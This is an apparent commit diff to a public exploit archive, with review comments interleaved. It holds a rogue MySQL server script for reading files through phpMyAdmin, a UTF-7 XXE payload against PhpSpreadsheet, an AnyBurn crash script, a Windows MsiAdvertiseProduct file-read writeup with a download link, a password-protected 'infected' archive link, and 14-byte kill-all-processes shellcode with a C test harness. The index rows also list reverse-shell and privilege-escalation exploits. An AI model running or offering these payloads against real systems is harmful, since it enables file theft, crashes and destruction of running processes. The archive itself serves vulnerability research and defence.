raise LastPacket()
else:
log.info('-- else')
raise ValueError('Unknown packet')
except LastPacket:
log.info('Last packet')
self.state = 'LEN'
self.sub_state = None
self.order = 0
self.set_terminator(3)
except OutOfOrder:
log.warning('Out of order')
self.push(None)
self.close_when_done()
else:
log.error('Unknown state')
self.push('None')
self.close_when_done()
class mysql_listener(asyncore.dispatcher):
def __init__(self, sock=None):
asyncore.dispatcher.__init__(self, sock)
if not sock:
self.create_socket(socket.AF_INET, socket.SOCK_STREAM)
self.set_reuse_addr()
try:
self.bind(('', PORT))
except socket.error:
exit()
self.listen(5)
def handle_accept(self):
pair = self.accept()
if pair is not None:
log.info('Conn from: %r', pair[1])
tmp = http_request_handler(pair)
z = mysql_listener()
daemonize()
asyncore.loop()
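Review bot: this file is the generic rogue MySQL server script (`__author__ = 'Gifts'`) with no Exploit-DB header at all, so nothing in it explains how it relates to phpMyAdmin 4.8.4 or the `AllowArbitraryServer` setting named in the commit message, which versions are affected, or how it is meant to be used; a header with title, author, reference and usage notes is needed. Code points: `push()` calls `str(data)` before writing, so every `self.push(None)` (and the `self.push('None')` in the final `else`) writes the literal text `None` to the client; calling `close_when_done()` alone is what was intended. The script is also Python 2 only (`xrange`, str payloads, `ord(raw_data[0])`) without saying so, and a failed `bind()` calls `exit()` silently with no log line explaining why.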


@ -0,0 +1,42 @@
# Product Description
PhpSpreadsheet is a library written in pure PHP that provides a set of classes allowing users to read from and write to different spreadsheet file formats, such as Excel and LibreOffice Calc.
# Vulnerabilities List
One vulnerability was identified within the PhpSpreadsheet library.
# Affected Version
Versions <=1.5.0
# Solution
Identify when the thread-safe libxmlDisableEntityLoader() function is available and disable the ability to load external entities when it is present. In addition, convert XML encoding to UTF-8 prior to performing a security scan.
This vulnerability is described in the following section.
# XML External Entity (XXE) Injection
The PhpSpreadsheet library is affected by XXE injection. This vulnerability could be leveraged to read files from a server that hosts an application using this library. An attacker who exploited this vulnerability could extract secrets, passwords, source code, and other sensitive data stored on the filesystem.
# Vulnerability Details
CVE ID: CVE-2018-19277
Access Vector: Network
Security Risk: High
Vulnerability: CWE-611
CVSS Base Score: 7.7
CVSS vector: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N
The PhpSpreadsheet library implements a security check that halts XML processing if an external entity is detected. An attacker could bypass the check by encoding the XML data as UTF-7 with the following payload:
```
<?xml version="1.0" encoding="UTF-7"?>
<!DOCTYPE xmlrootname [<!ENTITY % aaa SYSTEM "http://127.0.0.1:8080/ext.dtd">%aaa;%ccc;%ddd;]>
```
The payload above can then be stored as a sheet in a .XLSX document. The attacker can then unzip the .XLSX document and replace the contents of the file xl/worksheets/sheet1.xml with the UTF-7 encoded payload. The document containing the new sheet can then be rezipped.
When the PhpSpreadsheet library processes the newly created .XLSX document, the library makes a request to the URL http://127.0.0.1:8080/ext.dtd. A successful HTTP request means that the external entity was successfully processed.
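Review bot: 'Affected Version: Versions <=1.5.0' contradicts the entry title 'PhpSpreadsheet < 1.5.0 - XML External Entity (XXE)'; one of them is wrong, and the advisory should say which release contains the fix. The 'Solution' section is placed before the vulnerability description and describes the fix only in the abstract ('identify when the thread-safe libxmlDisableEntityLoader() function is available'); a pointer to the fixed release or upstream commit would let readers verify it. The CVSS vector carries PR:L while the write-up never states what privilege the attacker needs (presumably the ability to submit a spreadsheet to the application); stating that assumption would reconcile the two.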


@ -1,13 +1,13 @@
# Exploit Title: AnyBurn
# Date: 15-12-2018=20
# Date: 15-12-2018
# Vendor Homepage: http://www.anyburn.com/
# Software Link : http://www.anyburn.com/anyburn_setup.exe
# Exploit Author: Achilles
# Tested Version: 4.3 (32-bit)
# Tested on: Windows 7 x64
# Vulnerability Type: Denial of Service (DoS) Local Buffer Overflow
=20
# Steps to Produce the Crash:=20
# Steps to Produce the Crash:
# 1.- Run python code : AnyBurn.py
# 2.- Open EVIL.txt and copy content to clipboard
# 3.- Open AnyBurn choose 'Copy disk to Image'
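Review bot: the `=20` residue being removed here is quoted-printable encoding from a mail submission, and the fix is correct; while touching the header, note that the date is the only field in this commit written day-month-year ('15-12-2018'), whereas every other entry and files.csv use ISO dates (2018-12-22, 2018-12-23, 2018-12-24), so it should become 2018-12-15.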
@ -16,13 +16,13 @@
#!/usr/bin/env python
buffer =3D "\x41" * 10000
buffer = "\x41" * 10000
try:
=09f=3Dopen("Evil.txt","w")
=09print "[+] Creating %s bytes evil payload.." %len(buffer)
=09f.write(buffer)
=09f.close()
=09print "[+] File created!"
f=open("Evil.txt","w")
print "[+] Creating %s bytes evil payload.." %len(buffer)
f.write(buffer)
f.close()
print "[+] File created!"
except:
=09print "File cannot be created"
print "File cannot be created"
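Review bot: `=09` is a quoted-printable tab, so the replacement lines inside `try:` and `except:` must keep a leading tab (or spaces) as indentation or the file raises IndentationError; please confirm the committed lines are indented and not merely stripped of `=09`. The `buffer =3D` to `buffer =` change is correct. The script also remains Python 2 (`print` statements), and the bare `except:` swallows KeyboardInterrupt and every other error into the single message 'File cannot be created'.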


@ -0,0 +1,23 @@
The bug is in “MsiAdvertiseProduct”
Calling this function will result in a file copy by the installer service.
This will copy an arbitrary file that we can control with the first parameter into c:\windows\installer … a check gets done while impersonating, but using junctions there is still a TOCTOU .. meaning we can get it to copy any file as SYSTEM, and the destination file will always be readable. This results an in arbitrary file read vulnerability.
To reproduce:
Make sure to copy both readfile.exe and “file” (found under folder PoC-Files)… and put them in the same directory.
Usage: readfile.exe targetfile (where targetfile is the file to read, IE: “readfile.exe c:\users\test\desktop\desktop.ini”)
Run on 2 cores or more, this should work on one core with some modifications.. since you should be able to hit the timing with oplocks too (but I'm lazy).. you should be able to see something like this if it works: https://www.youtube.com/watch?v=x4P2H64GI1o
The easiest way to confirm the bug is to make two local accounts and read the desktop.ini of the other account.
Even without an enumeration vector, this is still bad news, because a lot of document software, like office, will actually keep files in static locations that contain the full path and filesnames of recently opened documents.. thus by reading files like this, you can get filenames of documents created by other users.. the filesystem is a spiderweb and references to user created files can be found everywhere.. so not having an enumeration bug is not that big of a deal.
If shadow copies are enabled you can obviously steal the SAM and SYSTEM hive I assume...
Maybe there's some other use-cases.. but I'm not very smart, so I don't know.
Download: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/46040.rar
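Review bot: this file carries none of the header fields (title, date, author, tested version, CVE) that the other entries in this commit have, and it matters here because the CSV in the same commit already lists a second entry for the same function (46028, "'MsiAdvertiseProduct' Arbitrary File Read"); without a header a reader cannot tell which writeup is the original and which is a reimplementation. The description also never names affected Windows versions or a fix. The defensively relevant facts are in the text and should be stated up front rather than buried: the access check is done while impersonating but the copy runs as SYSTEM, so the bug is a TOCTOU race between check and copy that needs a junction to redirect the source, and the destination under c:\windows\installer is always readable afterwards. That gives two things to look for on a host: reparse-point (junction) creation in the directory handed to the installer service, and unexpected files appearing under c:\windows\installer that are readable by the requesting user.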


@ -0,0 +1,2 @@
Download: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/46051.zip
Password: infected
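Review bot: the entry is a download link and an archive password with no description, affected version, CVE or test notes, so nothing about the bug can be reviewed from the file itself; the CSV row for it (46051) also classifies the type as local although the title says "Remote Code Execution (PoC)". At minimum the header block used by the other entries should be added so the archive's contents are described before anyone extracts a password-protected binary into a test environment.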


@ -6224,6 +6224,8 @@ id,file,description,date,author,type,platform,port
46022,exploits/windows/dos/46022.txt,"VBScript - VbsErase Reference Leak Use-After-Free",2018-12-20,"Google Security Research",dos,windows,
46023,exploits/windows/dos/46023.txt,"VBScript - MSXML Execution Policy Bypass",2018-12-20,"Google Security Research",dos,windows,
46030,exploits/windows/dos/46030.py,"SQLScan 1.0 - Denial of Service (PoC)",2018-12-21,"Rafael Pedrero",dos,windows,
46038,exploits/linux/dos/46038.py,"Angry IP Scanner for Linux 3.5.3 - Denial of Service (PoC)",2018-12-24,Sam,dos,linux,
46042,exploits/multiple/dos/46042.html,"Google Chrome 70 - SQLite Magellan Crash (PoC)",2018-12-15,zhuowei,dos,multiple,
3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@ -10167,6 +10169,9 @@ id,file,description,date,author,type,platform,port
46021,exploits/windows/local/46021.py,"Base64 Decoder 1.1.2 - Local Buffer Overflow (SEH)",2018-12-20,bzyo,local,windows,
46025,exploits/windows/local/46025.py,"AnyBurn 4.3 - Local Buffer Overflow (SEH)",2018-12-21,"Matteo Malvica",local,windows,
46028,exploits/windows/local/46028.txt,"Microsoft Windows - 'MsiAdvertiseProduct' Arbitrary File Read",2018-12-21,evil_polar_bear,local,windows,
46040,exploits/windows/local/46040.txt,"Microsoft Windows - 'MsiAdvertiseProduct' Arbitrary File Copy/Read",2018-12-20,SandboxEscaper,local,windows,
46044,exploits/linux/local/46044.md,"Keybase keybase-redirector - '$PATH' Local Privilege Escalation",2018-10-22,mirchr,local,linux,
46051,exploits/windows/local/46051.txt,"Adobe Flash ActiveX Plugin 28.0.0.137 - Remote Code Execution (PoC)",2018-12-24,smgorelik,local,windows,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
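Review bot: 46040 duplicates 46028 from the previous day (same function, 'MsiAdvertiseProduct'; the titles differ only by "Copy/"), so one row should say how it differs from the other, for example original writeup versus reimplementation, or one should be marked as a duplicate. 46051 is typed local while its title says "Remote Code Execution (PoC)"; the type column should follow the actual vector. The dates are also inconsistent with the ids: 46040 is dated 2018-12-20, earlier than 46028's 2018-12-21, and 46044 carries 2018-10-22; if the column means disclosure date that is fine, but it should be applied the same way across the three rows.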
@ -17029,6 +17034,9 @@ id,file,description,date,author,type,platform,port
45999,exploits/windows/remote/45999.txt,"MiniShare 1.4.1 - 'HEAD/POST' Remote Buffer Overflow",2018-12-18,"Rafael Pedrero",remote,windows,80
46024,exploits/multiple/remote/46024.rb,"Erlang - Port Mapper Daemon Cookie RCE (Metasploit)",2018-12-20,Metasploit,remote,multiple,25672
46034,exploits/multiple/remote/46034.py,"Netatalk < 3.1.12 - Authentication Bypass",2018-12-21,"Jacob Baines",remote,multiple,
46048,exploits/multiple/remote/46048.py,"Netatalk - Bypass Authentication",2018-12-21,"Tenable NS",remote,multiple,
46052,exploits/multiple/remote/46052.py,"Kubernetes - (Unauthenticated) Arbitrary Requests",2018-12-10,evict,remote,multiple,
46053,exploits/multiple/remote/46053.py,"Kubernetes - (Authenticated) Arbitrary Requests",2018-12-10,evict,remote,multiple,
6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
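Review bot: 46034 and 46048 are both Netatalk authentication bypass rows with the same date and different authors (Jacob Baines, Tenable NS); if 46048 is the Tenable team's version of the issue in 46034, its title should say so and should carry the affected version ("< 3.1.12") the way 46034's does, otherwise readers will treat them as two distinct bugs. The two Kubernetes rows leave the port column empty although they target a network service; the column is optional, but the other remote rows in this hunk fill it.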
@ -40524,3 +40532,8 @@ id,file,description,date,author,type,platform,port
46015,exploits/php/webapps/46015.txt,"Yeswiki Cercopitheque - 'id' SQL Injection",2018-12-19,"Mickael BROUTY",webapps,php,80
46017,exploits/multiple/webapps/46017.txt,"IBM Operational Decision Manager 8.x - XML External Entity Injection",2018-12-19,"Mohamed M.Fouad",webapps,multiple,9443
46027,exploits/php/webapps/46027.html,"ZeusCart 4.0 - Cross-Site Request Forgery (Deactivate Customer Accounts)",2018-12-21,mqt,webapps,php,
46035,exploits/php/webapps/46035.txt,"WSTMart 2.0.8 - Cross-Site Scripting",2018-12-24,linfeng,webapps,php,
46036,exploits/php/webapps/46036.txt,"WSTMart 2.0.8 - Cross-Site Request Forgery (Add Admin)",2018-12-24,linfeng,webapps,php,
46037,exploits/php/webapps/46037.txt,"FrontAccounting 2.4.5 - 'SubmitUser' SQL Injection",2018-12-24,"Sainadh Jamalpur",webapps,php,
46041,exploits/php/webapps/46041.py,"phpMyAdmin 4.8.4 - 'AllowArbitraryServer' Arbitrary File Read",2018-12-15,VulnSpy,webapps,php,
46050,exploits/php/webapps/46050.txt,"PhpSpreadsheet < 1.5.0 - XML External Entity (XXE)",2018-11-30,"Alex Leahu",webapps,php,
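Review bot: the five new webapp rows leave the port column blank while 46015 and 46017 above carry 80 and 9443; blank is accepted, but within one hunk the convention should be applied consistently. 46050 is the only new row whose title encodes the fixed version ("< 1.5.0"), which is the field defenders need most; 46041 (phpMyAdmin 4.8.4) and 46037 (FrontAccounting 2.4.5) name only the version tested, and the titles should make clear which of the two each number is.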


@ -927,3 +927,4 @@ id,file,description,date,author,type,platform
45943,shellcodes/linux_x86-64/45943.c,"Linux/x64 - Reverse (0.0.0.0:1907/TCP) Shell Shellcode (119 Bytes)",2018-12-04,"Kağan Çapar",shellcode,linux_x86-64
45980,shellcodes/linux_x86/45980.c,"Linux/x86 - Bind (1337/TCP) Ncat (/usr/bin/ncat) Shell (/bin/bash) + Null-Free Shellcode (95 bytes)",2018-12-11,T3jv1l,shellcode,linux_x86
46007,shellcodes/linux_x86-64/46007.c,"Linux/x64 - Disable ASLR Security Shellcode (93 Bytes)",2018-12-19,"Kağan Çapar",shellcode,linux_x86-64
46039,shellcodes/linux/46039.c,"Linux/x86 - Kill All Processes Shellcode (14 bytes)",2018-12-24,strider,shellcode,linux
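Review bot: 46039 is filed under shellcodes/linux/ with platform linux, while the comparable 32-bit entry 45980 sits in shellcodes/linux_x86/ with platform linux_x86 and this title itself says "Linux/x86"; path and platform should follow the existing x86 convention so that filtering by platform finds the entry.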


shellcodes/linux/46039.c Normal file

@ -0,0 +1,42 @@
# Exploit Title: Linux/x86 - Kill All Processes Shellcode (14 bytes)
# Google Dork: None
# Date: 2018-12-08
# Exploit Author: strider
# Vendor Homepage: None
# Software Link: None
# Tested on: Debian 9 Stretch i386/ Kali Linux i386
# CVE : None
# Shellcode Length: 14
# Description: Linux/x86 kill 9 -1 (14 bytes)
------------------------------[Description]---------------------------------
This shellcode will kill all processes
-----------------------------[Shellcode Dump]---------------------------------
08048060 <_start>:
8048060: 31 c0 xor %eax,%eax
8048062: 50 push %eax
8048063: b0 25 mov $0x25,%al
8048065: bb ff ff ff ff mov $0xffffffff,%ebx
804806a: b1 09 mov $0x9,%cl
804806c: cd 80 int $0x80
-----------------------------[Compile]---------------------------------------------
gcc -m32 -fno-stack-protector -z execstack -o tester tester.c
-----------------------------[C-Code]-----------------------------
#include<stdio.h>
#include<string.h>
unsigned char code[] = "\x31\xc0\x50\xb0\x25\xbb\xff\xff\xff\xff\xb1\x09\xcd\x80";
main()
{
printf("Shellcode Length: %d\n", strlen(code));
int (*ret)() = (int(*)())code;
ret();
}
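Review bot: the file is named .c but opens with '#'-style header lines and separator rows that are not C syntax, so it does not compile as committed; the compile line refers to tester.c, which the reader has to assemble by hand from the C-Code section. Within that section, `main()` relies on implicit int, which current compilers reject in their default C99/C11 mode, so it should be `int main(void)`; and `strlen(code)` reports 14 only because none of the bytes is 0x00, which is worth saying since that length check is the only sanity check the harness performs. Functionally the sequence is `kill(-1, 9)` (syscall 0x25 on 32-bit Linux with ebx = -1, ecx = 9), so running tester as an unprivileged user kills every process of that user, including the shell it was started from, and as root it takes down everything it is permitted to signal; the Tested-on line should say this was run in a disposable VM, and the "This shellcode will kill all processes" description should spell out that scope.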